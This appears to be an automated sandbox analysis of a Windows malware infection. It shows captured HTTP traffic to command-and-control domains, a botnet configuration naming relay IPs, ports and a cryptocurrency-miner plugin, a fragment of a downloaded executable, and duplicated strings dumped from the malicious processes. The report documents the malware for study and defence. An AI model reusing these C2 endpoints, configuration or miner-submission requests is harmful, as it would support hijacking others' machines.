Set-Cookie: VisitorID=d8fe5a56-a3a0-4e17-bb31-7f5dc4744215&Exp=3/6/2018 9:38:11 AM; expires=Tue, 06-Mar-2018 17:38:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 06 Mar 2015 17:38:10 GMT
Connection: close
<!doctype html>..<html>.....<head>...<meta charset="utf-8"/>...<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>...<meta name="viewport" content="width=device-width, initial-scale=1"/>.. ..<title>Mightglossary.net</title>..<meta name="keywords" content=" mightglossary.net" />..<meta name="description" content="" />..<script src='hXXp://code.jquery.com/jquery-latest.min.js' type='text/javascript'></script>..<script language='JavaScript' src='/js/standard.js?rte=1&tm=2&dn=mightglossary.net&tid=1020'></script>..<meta name='google' value='notranslate' />..<script type='text/javascript' language='JavaScript' src='/js/google_caf.js?rte=1&tm=2&dn=mightglossary.net&tid=1020'></script>..<script type='text/javascript' language='JavaScript' src='hXXp://VVV.google.com/adsense/domains/caf.js'></script>..<script type='text/javascript'>..var pageOptions =..{.. 'domainRegistrant' : 'as-drid-2864613873876811',.. 'relatedSearchBaseUrl': 'hXXp://mightglossary.net/?ac=2&slt=8&slr=1&lpt=2',.. 'resultsPageBaseUrl': 'hXXp://mightglossary.net/?ac=2&slt=8&slr=1&lpt=2',.. 'pageLoadedCallback': google_callback,.. 'pubId': 'dp-demandmedia02',.. 'channel': '000001',.. 'terms': '',.. 'optimizeTerms': true,.. 'adtest': 'off',.. 'hl': ''..};..var searchboxBlock =..{.. 'container': 'searchbox',.. 'type': 'searchbox',.. 'width': '300px',.. 'widthSearchButton': 70,..
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: throughcountry.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:38 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2741
Keep-Alive: timeout=5, max=123
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://throughcountry.net/?fp=w7y7FqjVPi+35vATrhHNATKikXPAGv4JZWtAce2QuVXnKYESjSduVewmbPKxY+l+jYoFAHMhvYKLzNN%2B02ULvA==&prvtof=GA+/hPGSv9VyeYxpGNTAJ+t383WcnElKtAsNh4/S3XE=&poru=z8zG8QkJNfFfX7Mwpss/k2tHKSqnfEat5RhDSKRPyPzc5OHfEJBYUN4rkcqt9WZ9n2j3z8tDVR1hTn8BjlJ8Cn414Wi0FLy6uVrKOjlp6+thgUD32HWOvVsD2y4MukR/ah21Yl5XHRM0y6kxBxYOuQ==&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://throughcountry.net/?fp=w7y7FqjVPi+35vATrhHNATKikXPAGv4JZWtAce2QuVXnKYESjSduVewmbPKxY+l+jYoFAHMhvYKLzNN+02ULvA==&prvtof=RZINKQn0zqeuQg1Zvnw5LzJdLdaHRzAxGeAQHwUsVnc=&poru=THlSTGBCi9tQ+Bt5haHsGx6eNyiigepbYiQld2Hh/IxbwX4GyppoiWMJZ25E3QyI71uVyuUy/6%2
<<< skipped >>>
GET /forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:03 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Server: ATS/5.0.1
ping.5.FLAG cfg.274."soilunder.net" "longcold.net" "deepsecond.net" "storyocean.net" "monthnext.net" "callmile.net" "longlower.net" "faceboat.net" "muchhappy.net" "shallgrave.net" "nailthere.net" "fieldthan.net" "ableread.net" "sellagain.net" "faceloud.net" "fearstate.net" "drivethirteen.net" var_user_ip.265.Þp_host% = "picturebecome.net";.Þp_path% = "/dep/";.%no_password% = "0";.%timer% = "180";.%ip% = "205.196.221.133";.%port% = "8079";.%relay_soxid% = "8083";.%thread_timeout% = "300";.%newport% = "31442";.%cpuinfo% = "QEMU Virtual CPU version 0.9.1 (2327 MHz)";.plugin.67369.miner_forced.149.8hGghbvdsfSHvxnjjkJFHDGsf4.win32plot2.exe 12754694899610736661 3b93ce01 107.155.116.121:1669,23.92.65.20:9446,107.155.116.121:80,23.92.65.20:80 0 76.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5S..fS..fS..f...fR..f<..f@..f<.-f...fZ..fV..fS..f...f<.,ft..f<..fR..fRichS..f................PE..L......T.....................r.......#............@..........................@............@.................................D...<............................ ..D.......................................@...............@............................text...0........................... ..`.rdata..r-..........................@..@.data....,..........................@....reloc..r.... ......................@..B.......................................................................................................................................
<<< skipped >>>
GET /IpLocator.htm HTTP/1.0
Accept: */*
Connection: close
Host: VVV.geobytes.com
HTTP/1.0 301 Moved Permanently
Date: Fri, 06 Mar 2015 17:39:04 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.6
Set-Cookie: PHPSESSID=oiihqhdpstgi0amsp89ootkt37; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /IpLocator
Content-Length: 0
Connection: close
Content-Type: text/html
Map
The Malware connects to the servers at the folowing location(s):
Strings from Dumps
ckxjtyt.exe_2836:
.text
.text
`.rdata
`.rdata
@.data
@.data
j.hP0L
j.hP0L
@-q}#f
@-q}#f
SSSh`D@
SSSh`D@
~2SSShPJ@
~2SSShPJ@
SSShP
SSShP
SSSh`1C
SSSh`1C
SQSSSh
SQSSSh
}GSSSh
}GSSSh
SSh`8E
SSh`8E
T$$SSSh
T$$SSSh
SSSh0`F
SSSh0`F
tsSSSh
tsSSSh
~PSSSh
~PSSSh
t>SSSh
t>SSSh
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
WS2_32.dll
WS2_32.dll
OLEAUT32.dll
OLEAUT32.dll
cmd.exe
cmd.exe
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
GDI32.dll
GDI32.dll
KERNEL32.dll
KERNEL32.dll
GetKeyboardType
GetKeyboardType
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
GetProcessHeap
GetProcessHeap
ckxjtyt.exe
ckxjtyt.exe
ubg.exe
ubg.exe
AutoConnect Engine WebClient Web Procedure Trap
AutoConnect Engine WebClient Web Procedure Trap
Key BitLocker Connection WMI Computer Shell
Key BitLocker Connection WMI Computer Shell
pogwoihcz.exe
pogwoihcz.exe
{bUdp
{bUdp
f/%xp
f/%xp
$%f-L
$%f-L
? .OS
? .OS
#,%cyz
#,%cyz
.OVko
.OVko
.gC?m
.gC?m
:C%f{J
:C%f{J
zcÃ
zcÃ
%Documents and Settings%\LocalService
%Documents and Settings%\LocalService
|%System%\pogwoihcz.exe
|%System%\pogwoihcz.exe
|decemberknew.net
|decemberknew.net
WATCHDOGPROC "c:\windows\system32\ckxjtyt.exe"
WATCHDOGPROC "c:\windows\system32\ckxjtyt.exe"
%System%\ckxjtyt.exe
%System%\ckxjtyt.exe
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL
win32plot2.exe_1396:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
GetProcessWindowStation
GetProcessWindowStation
operator
operator
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
kernel32.dll
kernel32.dll
%srecyclebin\ver1
%srecyclebin\ver1
%srecyclebin\*
%srecyclebin\*
%srecyclebin\%s
%srecyclebin\%s
%srecyclebin\*_*_*_*
%srecyclebin\*_*_*_*
%llu_%llu_%u_%u
%llu_%llu_%u_%u
%c:\recyclebin\%llu_%llu_%u_%u
%c:\recyclebin\%llu_%llu_%u_%u
%srecyclebin\%llu_%llu_%u_%u
%srecyclebin\%llu_%llu_%u_%u
%srecyclebin
%srecyclebin
Adjusting total nonces to %u to match stagger size
Adjusting total nonces to %u to match stagger size
System.PercentFull;
System.PercentFull;
Registry key TileInfo changed!
Registry key TileInfo changed!
Registry key PreviewDetails changed!
Registry key PreviewDetails changed!
%s\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
%s\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
win32burst2.exe
win32burst2.exe
%s %s %s %s %s
%s %s %s %s %s
KERNEL32.dll
KERNEL32.dll
RegEnumKeyExA
RegEnumKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\binaries_burst4\win32\win32plot2.exe
%System%\binaries_burst4\win32\win32plot2.exe
Bmscoree.dll
Bmscoree.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
win32burst2.exe_2548:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
GetProcessWindowStation
GetProcessWindowStation
operator
operator
ChunkSender[%d]: fuck
ChunkSender[%d]: fuck
ChunkSender[%d]: take a break! %d
ChunkSender[%d]: take a break! %d
[%d] Connected to server.
[%d] Connected to server.
kernel32.dll
kernel32.dll
recv = %s
recv = %s
POST /burst?requestType=submitNonce&accountId=%llu&nonce=%llu HTTP/1.0
POST /burst?requestType=submitNonce&accountId=%llu&nonce=%llu HTTP/1.0
%c:\recyclebin\*
%c:\recyclebin\*
%c:\recyclebin\%s
%c:\recyclebin\%s
Error opening file %s
Error opening file %s
WSAStartup failed: %d
WSAStartup failed: %d
KERNEL32.dll
KERNEL32.dll
WS2_32.dll
WS2_32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\binaries_burst4\win32\win32burst2.exe
%System%\binaries_burst4\win32\win32burst2.exe
7 7$7(7,7074787
7 7$7(7,7074787
#?,?
#?,?
? ?$?(?,?0?
? ?$?(?,?0?
@mscoree.dll
@mscoree.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
jrhwdmjgunjvubg.exe_2660:
.text
.text
`.rdata
`.rdata
@.data
@.data
j.hP0L
j.hP0L
@-q}#f
@-q}#f
SSSh`D@
SSSh`D@
~2SSShPJ@
~2SSShPJ@
SSShP
SSShP
SSSh`1C
SSSh`1C
SQSSSh
SQSSSh
}GSSSh
}GSSSh
SSh`8E
SSh`8E
T$$SSSh
T$$SSSh
SSSh0`F
SSSh0`F
tsSSSh
tsSSSh
~PSSSh
~PSSSh
t>SSSh
t>SSSh
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
WS2_32.dll
WS2_32.dll
OLEAUT32.dll
OLEAUT32.dll
cmd.exe
cmd.exe
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
GDI32.dll
GDI32.dll
KERNEL32.dll
KERNEL32.dll
GetKeyboardType
GetKeyboardType
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
GetProcessHeap
GetProcessHeap
ckxjtyt.exe
ckxjtyt.exe
ubg.exe
ubg.exe
AutoConnect Engine WebClient Web Procedure Trap
AutoConnect Engine WebClient Web Procedure Trap
Key BitLocker Connection WMI Computer Shell
Key BitLocker Connection WMI Computer Shell
pogwoihcz.exe
pogwoihcz.exe
{bUdp
{bUdp
f/%xp
f/%xp
$%f-L
$%f-L
? .OS
? .OS
#,%cyz
#,%cyz
.OVko
.OVko
.gC?m
.gC?m
:C%f{J
:C%f{J
zcÃ
zcÃ
%Documents and Settings%\LocalService
%Documents and Settings%\LocalService
%WinDir%\TEMP\jrhwdmjgunjvubg.exe
%WinDir%\TEMP\jrhwdmjgunjvubg.exe
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL
pogwoihcz.exe_3840:
.text
.text
`.rdata
`.rdata
@.data
@.data
j.hP0L
j.hP0L
@-q}#f
@-q}#f
SSSh`D@
SSSh`D@
~2SSShPJ@
~2SSShPJ@
SSShP
SSShP
SSSh`1C
SSSh`1C
SQSSSh
SQSSSh
}GSSSh
}GSSSh
SSh`8E
SSh`8E
T$$SSSh
T$$SSSh
SSSh0`F
SSSh0`F
tsSSSh
tsSSSh
~PSSSh
~PSSSh
t>SSSh
t>SSSh
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
WS2_32.dll
WS2_32.dll
OLEAUT32.dll
OLEAUT32.dll
cmd.exe
cmd.exe
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
GDI32.dll
GDI32.dll
KERNEL32.dll
KERNEL32.dll
GetKeyboardType
GetKeyboardType
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
GetProcessHeap
GetProcessHeap
ckxjtyt.exe
ckxjtyt.exe
ubg.exe
ubg.exe
AutoConnect Engine WebClient Web Procedure Trap
AutoConnect Engine WebClient Web Procedure Trap
Key BitLocker Connection WMI Computer Shell
Key BitLocker Connection WMI Computer Shell
pogwoihcz.exe
pogwoihcz.exe
{bUdp
{bUdp
f/%xp
f/%xp
$%f-L
$%f-L
? .OS
? .OS
#,%cyz
#,%cyz
.OVko
.OVko
.gC?m
.gC?m
:C%f{J
:C%f{J
zcÃ
zcÃ
%Documents and Settings%\LocalService
%Documents and Settings%\LocalService
%System%\pogwoihcz.exe
%System%\pogwoihcz.exe
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL